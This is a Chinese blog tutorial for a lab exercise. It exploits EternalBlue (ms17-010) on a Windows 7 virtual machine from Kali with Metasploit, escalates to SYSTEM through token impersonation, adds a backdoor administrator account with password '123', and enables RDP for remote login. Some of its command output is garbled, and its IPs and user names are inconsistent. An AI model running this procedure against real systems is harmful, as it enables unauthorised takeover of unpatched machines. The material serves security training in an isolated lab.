1、实验环境:vmware

  安装vmware16软件(一直下一步就行):如果需要输入激活码,跳过即可

  cn_windows_7_ultimate_x64_dvd_x15-66043.iso(靶机系统)

  kali-linux-2020.4-vmware-amd64.7z(系统环境)

2.创建vmware/windows虚拟机

kali(安全)-远程获取windows电脑管理员权限实验_linux

详细安装请私聊博主哈

3.vmware中的win7安装完成后,关闭防火墙

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_02

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_03

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_04

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_05

查看windows ip地址

kali(安全)-远程获取windows电脑管理员权限实验_linux_06

kali(安全)-远程获取windows电脑管理员权限实验_远程连接_07

ipconfig #简略信息
ipconfig /all #详细信息
查看自己虚拟机的ip地址,也是靶机地址一般是一个192.开头的内网地址

5.配置系统kali虚拟机


kali官网下载地址:https://www.kali.org/

下载好vm安装包之后配置好登录后进入系统中,欢迎来到kali测试系统

kali(安全)-远程获取windows电脑管理员权限实验_远程连接_08

打开终端(类似于windows cmd,但是功能更强大)

kali(安全)-远程获取windows电脑管理员权限实验_linux_09

进入kali系统命令终端

kali(安全)-远程获取windows电脑管理员权限实验_linux_10

ping 检查网络是否通畅

ping 10.0.0.130 #假设windows靶机虚拟机ip是10.0.0.130,大家的可能是192开头的
如果没有提示,就是不通,需要解决

ctrl+c取消当前操作

#如果你执行的命令卡住了,或者想取消就按ctrl+c(Linux快捷键)

ip a

#查看卡里ip地址 注意有空格!!!!
#如果连接Xshell则需要启动ssh服务
能ping通,但是ssh连不上,执行sudo /etc/init.d/ssh start,输入kali密码。

msfconsole ###测试环境

功防演练

环境说明

系统

IP

作用

windows 7系统

需要自己通过ipconfifig检查192.168.10.138

靶机,用来演练

kali系统

ip a查看ip地址192.168.10.137

用来进行测试

步骤

检查windows环境及基本信息

防火墙是否关闭(检查步骤和关闭步骤一致)

查看windows系统ip地址

ipconfig

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_11

检查kali系统

检查kali是否能ping通windows系统

在kali终端下面操作

ping 192.168.10.138 #注我的windows ip通过查询是192.168.10.138

如果结果中有个 time=xx ms 表示通了,==恭喜==, ==注意linux下面ping命令默认不会停止需要

ctrl+c停止==

kali(安全)-远程获取windows电脑管理员权限实验_linux_12

kali(安全)-远程获取windows电脑管理员权限实验_linux_13

开始

这里利用win7永恒之蓝漏洞(后来被人开发出来的),进行演练

打开kali系统终端,终端中输入 msfconsole 回车 ==注: 这里的进入后图形是随机的==

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_14

然后我们要查询永恒之蓝对应的漏洞:叫ms17-010 使用 search ms17-010 ==注意减号

kali(安全)-远程获取windows电脑管理员权限实验_远程连接_15

弹出很多,这里我们用序号是2的漏洞,注:一般来说每个漏洞利用方式不同,也需要搭建不同环境,这里

别选错了

使用2号漏洞 use 2 回车即可

kali(安全)-远程获取windows电脑管理员权限实验_linux_16

你会发现命令行,有红色的内容了,就是我们刚刚选择的漏洞

对于漏洞我们要进行基础设置才能用 输入 options 回车

kali(安全)-远程获取windows电脑管理员权限实验_linux_17

这里要修改的是 RHOSTS 你的目标是哪个机器 输入 set RHOSTS 192.168.10.138 因为我们已

经知道windows ip是192.168.10.138 ==RHOSTS 写为小写的也行==

发现里面的 RHOSTS已经被修改了

kali(安全)-远程获取windows电脑管理员权限实验_linux_18

可以开始测试了 输入 run

屏幕会有很多提示和输出 等待出现 ==WIN==即为成功

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_19

到这里其实已经进入到靶机成功了.

但是权限还不够,输入 use incognito 进入提权模式

输入sysinfo可查看靶机的信息
Computer : HH-PC
OS : Windows 7 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
#进入提权模式
meterpreter > use incognito
Loading extension incognito...Success.
#查看可用权限
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-2VJGDUILMF1\oldboy
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
#切换到system权限,注意加上双引号
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

实践操作创建截图:

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_20

但是目前还没有办法在远程机器上面执行命令(windows命令)

需要输入 shell 命令后回车

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_21

查IP发现已经登录到win7靶机中,创建一个用户,输入 net user admin 123 /add 用户名是admin,密码123

kali(安全)-远程获取windows电脑管理员权限实验_远程连接_22

可以输入 net user 检查是否有新用户admin

C:\Windows\system32>net user test 123 /add
�����ɹ����ɡ�
C:\Windows\system32>net user ##查看用户
net user
\\ ���û��ʻ�
---------------------------------------------------------------------------
----
Administrator Guest admin test
�����������ϣ�������һ��������������
C:\Windows\system32>net localgroup administrators admin /add #将admin用户添加
为管理

kali(安全)-远程获取windows电脑管理员权限实验_linux_23

最后去靶机windows7下面检查下是否已经建立管理员成功

       单击自己头像,开始----计算机---右键----管理

kali(安全)-远程获取windows电脑管理员权限实验_linux_24

kali(安全)-远程获取windows电脑管理员权限实验_linux_25

此时注销当前账号,可以使用test用户登录管理系统了。

开启win虚拟机3389端口远程连接靶机,开始”为所欲为“

1.开启靶机3389端口远程连接靶机,开始”为所欲为“。

##退出c盘环境
C:\Windows\system32>exit
exit
##激活靶机远程桌面功能
meterpreter > run post/windows/manage/enable_rdp ##激活靶机远程桌面功能
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it
to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file:
/home/kali/.msf4/loot/20210924045219_default.txt

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_26

2.在电脑windows宿主机

- win+徽标键进入运行窗口-输入cmd回车
C:\Users\oldboy>ping 192.168.10.138 -t #测试到靶机是否通畅
正在 Ping 10.0.0.132 具有 32 字节的数据:
来自 10.0.0.132 的回复: 字节=32 时间<1ms TTL=128
来自 10.0.0.132 的回复: 字节=32 时间<1ms TTL=128

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_27


3.开启远程连接后,远程连接靶机(使用创建的test管理员,密码123)**

进入运行窗口-输入mstsc回车,开启远程桌面客户端。
输入靶机Ip地址连接

kali(安全)-远程获取windows电脑管理员权限实验_远程连接_28

kali(安全)-远程获取windows电脑管理员权限实验_linux_29

kali(安全)-远程获取windows电脑管理员权限实验_ip地址_30